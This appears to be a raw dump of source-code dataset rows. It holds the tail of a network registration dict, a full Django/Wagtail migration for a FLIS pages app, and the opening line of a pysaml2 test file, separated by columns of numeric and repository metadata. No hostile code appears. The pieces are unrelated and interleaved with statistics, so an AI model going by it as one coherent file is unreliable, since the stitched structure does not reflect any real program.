"inst_id": 8192,
},
"0c75.bdff.3b1a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.3b1b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.3cf1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8192,
},
"0c75.bdff.3cf4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8192,
},
"0c75.bdff.3d73/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.41bb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0c75.bdff.79ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0c75.bdff.83db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.8311/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.8312/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.8315/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.8317/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.8318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.8443/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.8447/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.ac41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.ac5e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.ac84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.ac86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.ac88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.ac90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.ac94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.b765/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0c75.bdff.b76c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.be13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.be16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.be1a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.bffa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.bffb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.bffc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0c75.bdff.bffd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"7426.acff.f7cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
"7426.acff.0282/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"a89d.21ff.23dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"a89d.21ff.2818/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8192,
},
"a89d.21ff.35f6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
"a89d.21ff.36fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"a89d.21ff.3e8a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
"a89d.21ff.3e8c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"a89d.21ff.3e8f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"a89d.21ff.3e90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"a89d.21ff.40b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8192,
},
"a89d.21ff.40f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"a89d.21ff.40f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"a89d.21ff.515e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"a89d.21ff.54de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"a89d.21ff.54e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
}
},
},
}
}
| 43.776238
| 68
| 0.303118
| 62,971
| 817,959
| 3.739785
| 0.059043
| 0.15832
| 0.224286
| 0.158065
| 0.926445
| 0.898292
| 0.898292
| 0.898292
| 0.89819
| 0.896534
| 0
| 0.247392
| 0.559016
| 817,959
| 18,684
| 69
| 43.778581
| 0.405487
| 0
| 0
| 0.647078
| 0
| 0
| 0.319214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
07cd5eaa7c2a511153e418ebc6b75b8566522da9
| 134,411
|
py
|
Python
|
code/pages/migrations/0001_initial.py
|
eea/eea.docker.flis
|
9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907
|
[
"BSD-3-Clause"
] | null | null | null |
code/pages/migrations/0001_initial.py
|
eea/eea.docker.flis
|
9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907
|
[
"BSD-3-Clause"
] | null | null | null |
code/pages/migrations/0001_initial.py
|
eea/eea.docker.flis
|
9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-28 10:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
import pages.abstract_models
import pages.snippets
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtailimages.blocks
import wagtail.wagtailsnippets.blocks
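# Initial migration for the pages app: creates the Institution, TeamMember,
# Testimonial and Word models plus the StaticIndex/StaticPage Wagtail page types.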
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailimages', '0018_remove_rendition_filter'),
('wagtailcore', '0032_add_bulk_delete_page_permission'),
]
operations = [
migrations.CreateModel(
name='Institution',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('logo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to='wagtailimages.Image')),
],
),
migrations.CreateModel(
name='StaticIndex',
fields=[
('page_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True,
primary_key=True, serialize=False, to='wagtailcore.Page')),
('header_color', models.CharField(blank=True,
choices=[('aqua', 'Aqua'), ('black', 'Black'), ('cherry', 'Cherry'),
('lime', 'Lime'), ('purple', 'Purple'), ('orange', 'Orange'),
('red', 'Red')], max_length=255, null=True)),
('header_icon', models.CharField(blank=True, choices=[('book', 'Book'), ('chart', 'Chart'),
('clusters', 'Clusters'), ('counter', 'Counter'),
('cutlery', 'Cutlery'), ('database', 'Database'),
('drop', 'Drop'), ('eye', 'Eye'),
('glasses', 'Glasses'),
('indicator', 'Indicator'),
('lighting', 'Lightning'), ('diamond', 'Note'),
('puzzle', 'Puzzle'),
('road-signs', 'Road Signs'), ('stack', 'Stack'),
('strategy', 'Strategy'), ('sunset', 'Sunset'),
('target', 'Target'), ('upload', 'Upload'),
('users-leader', 'Users')], max_length=255,
null=True)),
('allowed_subpage_types', multiselectfield.db.fields.MultiSelectField(blank=True, choices=[
('flis_horison_scanning.Trend', 'flis_horison_scanning.Trend'),
('flis_horison_scanning.Uncertainty', 'flis_horison_scanning.Uncertainty'),
('flis_horison_scanning.WeakSignal', 'flis_horison_scanning.WeakSignal'),
('flis_horison_scanning.WildCard', 'flis_horison_scanning.WildCard'),
('flis_flip.Assesment', 'flis_flip.Assesment'),
('flis_flip.ForwardLookingActivity', 'flis_flip.ForwardLookingActivity')], max_length=178,
null=True)),
('page_template', models.CharField(blank=True, choices=[
('pages/drivers_of_change.html', 'pages/drivers_of_change.html'),
('pages/assesments_of_uses_index.html', 'pages/assesments_of_uses_index.html'),
('pages/foresight_in_policy_cycle_index.html', 'pages/foresight_in_policy_cycle_index.html')],
max_length=255, null=True)),
('header_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=(pages.abstract_models.TemplateableMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='StaticPage',
fields=[
('page_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True,
primary_key=True, serialize=False, to='wagtailcore.Page')),
('header_color', models.CharField(blank=True,
choices=[('aqua', 'Aqua'), ('black', 'Black'), ('cherry', 'Cherry'),
('lime', 'Lime'), ('purple', 'Purple'), ('orange', 'Orange'),
('red', 'Red')], max_length=255, null=True)),
('header_icon', models.CharField(blank=True, choices=[('book', 'Book'), ('chart', 'Chart'),
('clusters', 'Clusters'), ('counter', 'Counter'),
('cutlery', 'Cutlery'), ('database', 'Database'),
('drop', 'Drop'), ('eye', 'Eye'),
('glasses', 'Glasses'),
('indicator', 'Indicator'),
('lighting', 'Lightning'), ('diamond', 'Note'),
('puzzle', 'Puzzle'),
('road-signs', 'Road Signs'), ('stack', 'Stack'),
('strategy', 'Strategy'), ('sunset', 'Sunset'),
('target', 'Target'), ('upload', 'Upload'),
('users-leader', 'Users')], max_length=255,
null=True)),
('subtitle', models.CharField(blank=True, max_length=255, null=True)),
('content', wagtail.wagtailcore.fields.StreamField((('three_columns',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'first_column_color',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'aqua',
'Aqua'),
(
'black',
'Black'),
(
'cherry',
'Cherry'),
(
'lime',
'Lime'),
(
'purple',
'Purple'),
(
'orange',
'Orange'),
(
'red',
'Red')])),
(
'first_column_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'second_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'second_column_color',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'aqua',
'Aqua'),
(
'black',
'Black'),
(
'cherry',
'Cherry'),
(
'lime',
'Lime'),
(
'purple',
'Purple'),
(
'orange',
'Orange'),
(
'red',
'Red')])),
(
'second_column_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'third_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'third_column_color',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'aqua',
'Aqua'),
(
'black',
'Black'),
(
'cherry',
'Cherry'),
(
'lime',
'Lime'),
(
'purple',
'Purple'),
(
'orange',
'Orange'),
(
'red',
'Red')])),
(
'third_column_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')]))))),
('four_columns_with_image',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('image',
wagtail.wagtailimages.blocks.ImageChooserBlock(
required=True)),
(
'first_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'second_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'third_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'fourth_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'read_more_button',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=False))))),
('heading_with_text',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('style',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'white',
'White background'),
(
'community',
'Community background')])),
('items',
wagtail.wagtailcore.blocks.ListBlock(
wagtail.wagtailcore.blocks.StructBlock(
((
'heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True))))))))),
('heading_with_image',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('image',
wagtail.wagtailimages.blocks.ImageChooserBlock(
required=True)),
(
'read_more_button',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=False))))),
('community_stats',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True))))),
('team', wagtail.wagtailcore.blocks.StructBlock(((
'first_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember)),
(
'second_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember)),
(
'third_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember)),
(
'fourth_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember))))),
('institutions',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('items',
wagtail.wagtailcore.blocks.ListBlock(
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Institution)))))),
('polygon_header',
wagtail.wagtailcore.blocks.StructBlock(((
'first_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'first_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'second_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'second_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'third_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'third_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'fourth_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'fourth_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'fifth_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fifth_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'fifth_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'sixth_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'sixth_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'sixth_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')]))))),
('topic_grid',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'larger_images',
wagtail.wagtailcore.blocks.BooleanBlock(
default=False,
required=False)),
('items',
wagtail.wagtailcore.blocks.ListBlock(
wagtail.wagtailcore.blocks.PageChooserBlock(
target_model='topics.TopicIndexPage'))),
(
'read_more_button',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=False))))),
('testimonials',
wagtail.wagtailcore.blocks.StructBlock(((
'first_testimonial',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Testimonial)),
(
'second_testimonial',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Testimonial)),
(
'third_testimonial',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Testimonial))))),
('drivers_of_change',
wagtail.wagtailcore.blocks.StructBlock(((
'all_drivers_page',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=True)),))),
('foresight_in_policy_cycle',
wagtail.wagtailcore.blocks.StructBlock(((
'read_more_link',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=True)),))),
('assesments_of_uses',
wagtail.wagtailcore.blocks.StructBlock(((
'read_more_link',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=True)),)))),
blank=True)),
('page_template', models.CharField(blank=True,
choices=[('pages/home_page.html', 'pages/home_page.html'), (
'pages/foresight_dictionary.html',
'pages/foresight_dictionary.html')], max_length=255, null=True)),
('header_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=(pages.abstract_models.TemplateableMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('country', models.CharField(max_length=255)),
('organisation', models.CharField(max_length=255)),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to='wagtailimages.Image')),
],
),
migrations.CreateModel(
name='Testimonial',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=255)),
('text', wagtail.wagtailcore.fields.RichTextField()),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to='wagtailimages.Image')),
],
),
migrations.CreateModel(
name='Word',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('word', models.CharField(max_length=255)),
('description', wagtail.wagtailcore.fields.RichTextField()),
('live', models.BooleanField(default=True, verbose_name='Is published')),
],
options={
'verbose_name': 'Dictionary word',
'verbose_name_plural': 'Dictionary words',
},
),
]
| 118.947788
| 168
| 0.10026
| 2,024
| 134,411
| 6.523221
| 0.105731
| 0.133606
| 0.17087
| 0.08748
| 0.886238
| 0.851322
| 0.84549
| 0.821859
| 0.739377
| 0.725668
| 0
| 0.003793
| 0.868567
| 134,411
| 1,129
| 169
| 119.053144
| 0.743575
| 0.000506
| 0
| 0.655971
| 1
| 0
| 0.04575
| 0.006245
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008913
| 0
| 0.012478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
07ef4b91ac1e56c2175c1d474bb4ea1d9a0c9da2
| 91,040
|
py
|
Python
|
tests/test_50_server.py
|
brunato/pysaml2
|
a9a4fe9601cac56917e38197c177772084dc5ce0
|
[
"Apache-2.0"
] | 249
|
2018-03-01T09:47:04.000Z
|
2022-03-26T04:51:26.000Z
|
tests/test_50_server.py
|
brunato/pysaml2
|
a9a4fe9601cac56917e38197c177772084dc5ce0
|
[
"Apache-2.0"
] | 416
|
2018-02-21T15:18:35.000Z
|
2022-03-04T16:59:36.000Z
|
tests/test_50_server.py
|
brunato/pysaml2
|
a9a4fe9601cac56917e38197c177772084dc5ce0
|
[
"Apache-2.0"
] | 203
|
2018-02-21T13:53:12.000Z
|
2022-03-08T22:22:17.000Z
|
#!/usr/bin/env python
